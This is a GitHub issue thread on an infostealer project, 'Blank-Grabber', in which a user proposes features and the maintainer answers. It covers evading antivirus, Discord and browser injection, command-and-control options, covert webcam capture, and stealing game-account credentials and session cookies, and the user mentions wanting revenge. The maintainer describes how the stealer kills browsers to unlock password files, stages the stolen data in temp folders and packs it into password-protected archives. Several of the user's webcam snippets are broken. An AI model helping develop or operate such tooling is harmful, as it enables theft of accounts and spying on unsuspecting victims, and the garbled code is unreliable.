### ISSUE TITLE
suggestions : more features 

### ISSUE THREAD

**Issue by aryan5555github** [Blank-c/Blank-Grabber#260]
@Blank-c I have good ideas for some features
Some of them are :-
fully undetected exe file 0/64 virustotal 
Better discord and browser injection
more c2 servers

**Comment by Blank-c** [comment]
1) FUD not possible with pyinstaller.
2) The injection is not coded by be (I don't write javascript) so we'd have to wait until I find (or someone make) a better injection.
3) Can you give some examples of more C2 servers?

**Comment by aryan5555github** [comment]
hmmmmmm
Pyinetaller makes py into exe so obsfucate the py

Also find some good no dualhook js injection for discord browsers and other things like Gmail and YouTube

For the c2 u should make one in py I mean just host one at local host or 127.0.0.1 or smth like that with a secret key tat can be like the webhook or smth

**Comment by aryan5555github** [comment]
Oh and also make cookies importable like making them into .json or Netscape and also make py be able to take pictures form webcam I will provide some sample untested code bcz I'm on phone

**Comment by Blank-c** [comment]
> making

Cookies are already in netscape format. The py file can already take webcam pics.

**Comment by aryan5555github** [comment]
Webcam code untested

import cv2

def take_webcam_screenshot():
    # Check if a webcam is available
    if cam == "cam_yes":
        # Open the webcam
        cap = cv2.VideoCapture(0)

        # Check if the webcam is opened successfully
        if not cap.isOpened():
            print("Unable to open the webcam.")
            return

        # Read a frame from the webcam
        ret, frame = cap.read()

        # Check if a frame is successfully read
        if not ret:
            #print("Unable to capture a frame.")
            return

        # Release the webcam
        cap.release()

        # Save the frame as an image file
        cv2.imwrite("screenshot.jpg", frame)

        #print("Screenshot captured and saved as screenshot.jpg")
    else:
        #print("No webcam detected.")

def check_webcam_available():
    # Attempt to open the webcam
    cap = cv2.VideoCapture(0)

    # Check if the webcam is opened successfully
    if cap.isOpened():
        cam = "cam_yes"  # Webcam detected
    else:
        cam = "cam_no"  # No webcam detected

    # Release the webcam for 
#the late reply 😁😁😁😁
    cap.release()

    return cam

# Call the function to check webcam availability (for log lol)
cam = check_webcam_available()

# Call the function to take a screenshot lol wat am i doin
take_webcam_screenshot()



@Blank-c modify it accordingly

**Comment by aryan5555github** [comment]
And more features lemme just

**Comment by Blank-c** [comment]
> hmmmmmm Pyinetaller makes py into exe so obsfucate the py

The py file is already much obfuscated and further obfuscation isn't changing the detection rate. I have tried it


> Also find some good no dualhook js injection for discord browsers and other things like Gmail and YouTube

You can leverage the add to startup option for this

> For the c2 u should make one in py I mean just host one at local host or 127.0.0.1 or smth like that with a secret key tat can be like the webhook or smth

One need to port forward their host in order to do this and also this project is a mere stealer, I don't want to turn it into a rat.

**Comment by Blank-c** [comment]
> Webcam code untested
> 
> import cv2
> 
> def take_webcam_screenshot(): # Check if a webcam is available if cam == "cam_yes": # Open the webcam cap = cv2.VideoCapture(0)
> 
> ```
>     # Check if the webcam is opened successfully
>     if not cap.isOpened():
>         print("Unable to open the webcam.")
>         return
> 
>     # Read a frame from the webcam
>     ret, frame = cap.read()
> 
>     # Check if a frame is successfully read
>     if not ret:
>         #print("Unable to capture a frame.")
>         return
> 
>     # Release the webcam
>     cap.release()
> 
>     # Save the frame as an image file
>     cv2.imwrite("screenshot.jpg", frame)
> 
>     #print("Screenshot captured and saved as screenshot.jpg")
> else:
>     #print("No webcam detected.")
> ```
> 
> def check_webcam_available(): # Attempt to open the webcam cap = cv2.VideoCapture(0)
> 
> ```
> # Check if the webcam is opened successfully
> if cap.isOpened():
>     cam = "cam_yes"  # Webcam detected
> else:
>     cam = "cam_no"  # No webcam detected
> 
> # Release the webcam for 
> ```
> 
> #the late reply 😁😁😁😁 cap.release()
> 
> ```
> return cam
> ```
> 
> # Call the function to check webcam availability (for log lol)
> cam = check_webcam_available()
> 
> # Call the function to take a screenshot lol wat am i doin
> take_webcam_screenshot()
> 
> @Blank-c modify it accordingly

I know this, but opencv is a very large library and it would make the executable very large.

**Comment by aryan5555github** [comment]
... no it won't just import only required things

**Comment by aryan5555github** [comment]
> 

It was never abt a rat

**Comment by aryan5555github** [comment]
And importabl cookies
Also make roblox and mc things importable
If tats done I'll get my revenge on them the worst thing tat ever happened to this world we don't talk abt tat 🪥

**Comment by aryan5555github** [comment]
@Blank-c here is updated code


from cv2 import VideoCapture, imwrite, imshow, waitKey, destroyAllWindows

def take_webcam_screenshot():
    # Check if a webcam is available
    if cam == "cam_yes":
        # Open the webcam
        cap = VideoCapture(0)

        # Check if the webcam is opened successfully
        if not cap.isOpened():
            print("Unable to open the webcam.")
            return

        # Read a frame from the webcam
        ret, frame = cap.read()

        # Check if a frame is successfully read
        if not ret:
            print("Unable to capture a frame.")
            return

        # Release the webcam
        cap.release()

        # Save the frame as an image file
        imwrite("screenshot.jpg", frame)

        print("Screenshot captured and saved as screenshot.jpg")

        # Display the captured frame (optional)
        imshow("Webcam Screenshot", frame)
        waitKey(0)
        destroyAllWindows()
    else:
        print("No webcam detected.")

def check_webcam_available():
    # Attempt to open the webcam
    cap = VideoCapture(0)

    # Check if the webcam is opened successfully
    if cap.isOpened():
        cam = "cam_yes"  # Webcam detected
    else:
        cam = "cam_no"  # No webcam detected

    # Release the webcam
    cap.release()

    return cam

# Call the function to check webcam availability
cam = check_webcam_available()

# Call the function to take a screenshot
take_webcam_screenshot()

Modify it to work with the stealer

**Comment by aryan5555github** [comment]
:)

**Comment by aryan5555github** [comment]
@Blank-c better code tat imports required things

```python
from cv2 import VideoCapture, imwrite, imshow, waitKey, destroyAllWindows

def take_webcam_screenshot():
    # Check if a webcam is available
    if cam == "cam_yes":
        # Open the webcam
        cap = VideoCapture(0)

        # Check if the webcam is opened successfully
        if not cap.isOpened():
            print("Unable to open the webcam.")
            return

        # Read a frame from the webcam
        ret, frame = cap.read()

        # Check if a frame is successfully read
        if not ret:
            print("Unable to capture a frame.")
            return

        # Release the webcam
        cap.release()

        # Save the frame as an image file
        imwrite("screenshot.jpg", frame)

        print("Screenshot captured and saved as screenshot.jpg")

        # Display the captured frame (optional)
        imshow("Webcam Screenshot", frame)
        waitKey(0)
        destroyAllWindows()
    else:
        print("No webcam detected.")

def check_webcam_available():
    # Attempt to open the webcam
    cap = VideoCapture(0)

    # Check if the webcam is opened successfully
    if cap.isOpened():
        cam = "cam_yes"  # Webcam detected
    else:
        cam = "cam_no"  # No webcam detected

    # Release the webcam
    cap.release()

    return cam

# Call the function to check webcam availability
cam = check_webcam_available()

# Call the function to take a screenshot
take_webcam_screenshot()

```

**Comment by Blank-c** [comment]
> ... no it won't just import only required things

It does, `cv2` is a very big library.

> It was never abt a rat

The basic idea of a rat is a piece of malware which can remotely be accessed by the attacker, if we can make localhost or our own server as a C2, it would typically become a remote access trojan.

> And importabl cookies Also make roblox and mc things importable If tats done I'll get my revenge on them the worst thing tat ever happened to this world we don't talk abt tat 🪥

Cookies are already importable in firefox, see #133
Roblox cookie can be imported using extentions such as cookie editor, cookiebro, etc.
Minecraft file can be 'imported'. You just need to paste the file in your own minecraft directory. If the session in valid, you will be logged in.

**Comment by Blank-c** [comment]
> @Blank-c better code tat imports required things
> 
> ```python
> from cv2 import VideoCapture, imwrite, imshow, waitKey, destroyAllWindows
> # long code
> ```

This still import the `cv2` library.

**Comment by aryan5555github** [comment]
Time to find an alternative to cv2

**Comment by aryan5555github** [comment]
Also find some good injection for discord and browsers

**Comment by aryan5555github** [comment]
This might work

```python
from PIL import Image
import numpy as np
import pyvirtualcam

def check_webcam_available():
    try:
        with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
            cam.start()
            cam.stop()
        return "cam_yes"  # Webcam detected
    except pyvirtualcam.DeviceNotFoundError:
        return "cam_no"  # No webcam detected

def take_webcam_screenshot():
    # Check if a webcam is available
    if cam == "cam_yes":
        with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
            # Capture a screenshot
            image = Image.open('screenshot.jpg')

            # Resize the image to match the webcam resolution
            image = image.resize((640, 480))

            # Convert the image to RGB format
            image = image.convert('RGB')

            # Convert the image to a numpy array
            frame = np.array(image)

            # Send the frame to the virtual webcam
            cam.send(frame)

        print("Screenshot captured and sent to the webcam.")
    else:
        print("No webcam detected.")

# Call the function to check webcam availability
cam = check_webcam_available()

# Call the function to take a screenshot
take_webcam_screenshot()

```

**Comment by aryan5555github** [comment]
@Blank-c try i made it on a simple notepad

On phon

**Comment by Blank-c** [comment]
Bro you literally import numpy, the exe would be very huge.
Check for yourself. Use the command `pyinstaller --onefile <your file>.py` after installing pyinstaller using `pip install pyinstaller`

**Comment by aryan5555github** [comment]
Awwwwwwwwwww
@Blank-c pls comment ur code now I'm turning on my pc I think I can add smth (after testing ofc)

**Comment by Blank-c** [comment]
> my

which code?

**Comment by aryan5555github** [comment]
Ur bank-graber whol code in on pc

**Comment by aryan5555github** [comment]
+I'm a dev

**Comment by aryan5555github** [comment]
+this new code has 0 numpy
```python
from PIL import Image
import pyvirtualcam

def check_webcam_available():
    try:
        with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
            cam.start()
            cam.stop()
        return "cam_yes"  # Webcam detected
    except pyvirtualcam.DeviceNotFoundError:
        return "cam_no"  # No webcam detected

def take_webcam_screenshot():
    # Check if a webcam is available
    if cam == "cam_yes":
        with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
            # Capture a screenshot
            image = Image.open('screenshot.jpg')

            # Resize the image to match the webcam resolution
            image = image.resize((640, 480))

            # Convert the image to RGB format
            image = image.convert('RGB')

            # Create a byte array from the image data
            frame = image.tobytes()

            # Send the frame to the virtual webcam
            cam.send(frame)

        print("Screenshot captured and sent to the webcam.")
    else:
        print("No webcam detected.")

# Call the function to check webcam availability
cam = check_webcam_available()

# Call the function to take a screenshot
take_webcam_screenshot()

```

**Comment by Blank-c** [comment]
> 

Isn't the code already on github

**Comment by Blank-c** [comment]
> +this new code has 0 numpy
> 
> ```python
> from PIL import Image
> import pyvirtualcam
> 
> def check_webcam_available():
>     try:
>         with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
>             cam.start()
>             cam.stop()
>         return "cam_yes"  # Webcam detected
>     except pyvirtualcam.DeviceNotFoundError:
>         return "cam_no"  # No webcam detected
> 
> def take_webcam_screenshot():
>     # Check if a webcam is available
>     if cam == "cam_yes":
>         with pyvirtualcam.Camera(width=640, height=480, fps=30) as cam:
>             # Capture a screenshot
>             image = Image.open('screenshot.jpg')
> 
>             # Resize the image to match the webcam resolution
>             image = image.resize((640, 480))
> 
>             # Convert the image to RGB format
>             image = image.convert('RGB')
> 
>             # Create a byte array from the image data
>             frame = image.tobytes()
> 
>             # Send the frame to the virtual webcam
>             cam.send(frame)
> 
>         print("Screenshot captured and sent to the webcam.")
>     else:
>         print("No webcam detected.")
> 
> # Call the function to check webcam availability
> cam = check_webcam_available()
> 
> # Call the function to take a screenshot
> take_webcam_screenshot()
> ```

No webcams available ...

**Comment by aryan5555github** [comment]
u dont have webacm

**Comment by Blank-c** [comment]
> u dont have webacm

Bruh, I litterally have one, did you test the code yourself?

**Comment by aryan5555github** [comment]
no my pc is still bootin also i dont have webcam

**Comment by aryan5555github** [comment]
just forget abt pycam for a sec ill figure it out i alwaws do now for .js injections

**Comment by Blank-c** [comment]
> 

Just debug your code, did you copy it from somewhere? You literally have tried to invoke functions which are not even in the library.

**Comment by Blank-c** [comment]
Also, pyvirtual cam imports numpy.

**Comment by Blank-c** [comment]
> just forget abt pycam for a sec ill figure it out i alwaws do now for .js injections

I already updated the discord injection.

**Comment by aryan5555github** [comment]
k also my browser crased after built.exe ran pls fix

**Comment by aryan5555github** [comment]
no copy

**Comment by Blank-c** [comment]
> k also my browser crased after built.exe ran pls fix

Its not an error, the grabber kills the browser because the browser locks the cookies, passwords, history file and prevent others (including apps) from copying it.

**Comment by aryan5555github** [comment]
ok

**Comment by aryan5555github** [comment]
lemme check some good browser injections

**Comment by aryan5555github** [comment]
@Blank-c i found a good discord injection https://github.com/lnfernal/Discord-Injection
also i found browser inject not found yet

**Comment by Blank-c** [comment]
Like I said, I already updated the injection.
Also the repo you sent link of is 1 year old.

**Comment by aryan5555github** [comment]
Include use of multiple py and exe

**Comment by aryan5555github** [comment]
I mean they will run py

**Comment by aryan5555github** [comment]
Accidentally closed

**Comment by Blank-c** [comment]
> Include use of multiple py and exe

What do you mean?

**Comment by aryan5555github** [comment]
@Blank-c I mean option to include multiple python and exe files to run once exe ran

**Comment by Blank-c** [comment]
I can add multiple exe, but not multiple py file.

**Comment by aryan5555github** [comment]
Why not

**Comment by Blank-c** [comment]
Because those files cannot be run in another process unlike the executable. Also if you want multiple exe, consider using a exe joiner.

**Comment by aryan5555github** [comment]
Hmmmmm k

**Comment by aryan5555github** [comment]
It would be still nice tat option could make tat py into exe

**Comment by aryan5555github** [comment]
Oh and also add an option to include a txt file tat has names of all apps installed

**Comment by aryan5555github** [comment]
Also an option to include list of stem games and email id and password n username
And stem games made

Roblx games played and username email password 
And roblx games made

Minecraft username email id and password and also servers visit and hosted
@Blank-c

**Comment by aryan5555github** [comment]
Also u should comment ur blank grabber then I could add smth

**Comment by Blank-c** [comment]
> Also an option to include list of stem games and email id and password n username And stem games made

Bro calm down, they are basically useless. And if someone wants to take a look, they can simply login into the account.
> 
> Roblx games played and username email password And roblx games made

Authenticating roblox cookie resets it.

> Minecraft username email id and password and also servers visit and hosted @Blank-c

This info is stored on the server, not the local storage.

**Comment by Blank-c** [comment]
> Also u should comment ur blank grabber then I could add smth

I still don't understand what you mean. If you can, you can join my telegram channel and ask stuff there.

**Comment by baalware** [comment]
A interesting chat

**Comment by aryan5555github** [comment]
@Blank-c I MEAN TAT if u comment ur blank grabber code i can understand it and i could add few things

**Comment by aryan5555github** [comment]
i mean like i know python a little

**Comment by Blank-c** [comment]
> @Blank-c I MEAN TAT if u comment ur blank grabber code i can understand it and i could add few things

Bro this is literally github. The code is already open for anyone to view.

**Comment by aryan5555github** [comment]
K oh ok

**Comment by aryan5555github** [comment]
Also abt tat multiple exe runner

**Comment by Blank-c** [comment]
I dom't think I should implement it as it would cause problem with the builder, if you still wanna use it., try to search for an exe binder online.

**Comment by aryan5555github** [comment]
@Blank-c i have idea a email c2

**Comment by Blank-c** [comment]
emailc2 is bad and should not be used. If one gets access to the email, they get access to all the logs

**Comment by aryan5555github** [comment]
like a tempmail @Blank-c

**Comment by Blank-c** [comment]
not really possible, it needs a email and password and noone even use email based stealers.

**Comment by aryan5555github** [comment]
Ok

**Comment by Codepulze** [comment]
the code is GPT Generated probably lol

**Comment by Blank-c** [comment]
> the code is GPT Generated probably lol

Ye it does look like it. GPT most of the time generate wrong codes for complex programs.

**Comment by aryan5555github** [comment]
No anyway I know python but I forgot to use tat mods

**Comment by aryan5555github** [comment]
@Blank-c u should add option to detect if pc used VPN and grab VPN and main ip

**Comment by aryan5555github** [comment]
And to detect all apps on a pc and put it in a txt file in tat .rar thing

**Comment by aryan5555github** [comment]
@Blank-c hello?

**Comment by Blank-c** [comment]
How can that be useful tho?

**Comment by Blank-c** [comment]
You can make a pull request if you are experienced in python, instead of giving suggestions, I'll really appreciate that.

**Comment by aryan5555github** [comment]
Also wat files go to tat rar file where do those files get placed? Tat go into rar

**Comment by Blank-c** [comment]
> Also wat files go to tat rar file where do those files get placed? Tat go into rar

There is a `Tempfolder` variable, it makes a randomly named folder in the `temp` folder, all the content to be compressed in the archive is stored in that folder.

**Comment by aryan5555github** [comment]
wher

**Comment by aryan5555github** [comment]
emme look atmur code

**Comment by aryan5555github** [comment]
didnt find yet

**Comment by Blank-c** [comment]
https://github.com/Blank-c/Blank-Grabber/blob/main/Blank%20Grabber/Components/stub.py#L912-L917

**Comment by aryan5555github** [comment]
K

**Comment by aryan5555github** [comment]
Adjustable common file size

**Comment by aryan5555github** [comment]
And txt will all installed apps

**Comment by aryan5555github** [comment]
@Blank-c

**Comment by Blank-c** [comment]
I am quite busy this month, you may experiment with the code and make a pull request.

**Comment by aryan5555github** [comment]
ok

**Comment by aryan5555github** [comment]
@Blank-c why is files rar ed why not ziped with . zip

**Comment by Blank-c** [comment]
Python has no built in password protection for zip file, so the stealer uses 3rd party app which uses rar format.

**Comment by aryan5555github** [comment]
k

**Comment by aryan5555github** [comment]
@Blank-c i want to add smth can i have adder perms or smth

**Comment by aryan5555github** [comment]
and where is the tempfolder?

**Comment by aryan5555github** [comment]
where founfd?

**Comment by Blank-c** [comment]
> @Blank-c i want to add smth can i have adder perms or smth

You can easily add something. Just fork the repo using the fork button and makw your changes in the forked repository under your account. Then simply make a pull request. If I like it, I'll accept the changes and the code will be added to this.

**Comment by Blank-c** [comment]
> and where is the tempfolder?

https://github.com/Blank-c/Blank-Grabber/blob/main/Blank%20Grabber/Components/stub.py#L912-L917

**Comment by aryan5555github** [comment]
@Blank-c which path

**Comment by aryan5555github** [comment]
oh ok in temp
%temp%

**Comment by aryan5555github** [comment]
a temp folder in the temp dir

**Comment by aryan5555github** [comment]
i made updated .bat and updated readme.txt so tat they r actually helpful

**Comment by aryan5555github** [comment]
how does stub.py rars the folder there is no rar.exe anymore

**Comment by Blank-c** [comment]
> how does stub.py rars the folder there is no rar.exe anymore

It is in the components folder.

**Comment by Blank-c** [comment]
The rar.exe is packed with the other files in the `sys._MEIPASS` folder from where it executes it.

**Comment by aryan5555github** [comment]
ill make a pull request @Blank-c

**Comment by aryan5555github** [comment]
also those cookies tat we get in a .txt r they netscape @Blank-c

**Comment by Blank-c** [comment]
> also those cookies tat we get in a .txt r they netscape @Blank-c

yes they are.

**Comment by Blank-c** [comment]
> ill make a pull request @Blank-c

I'll check when I get home.
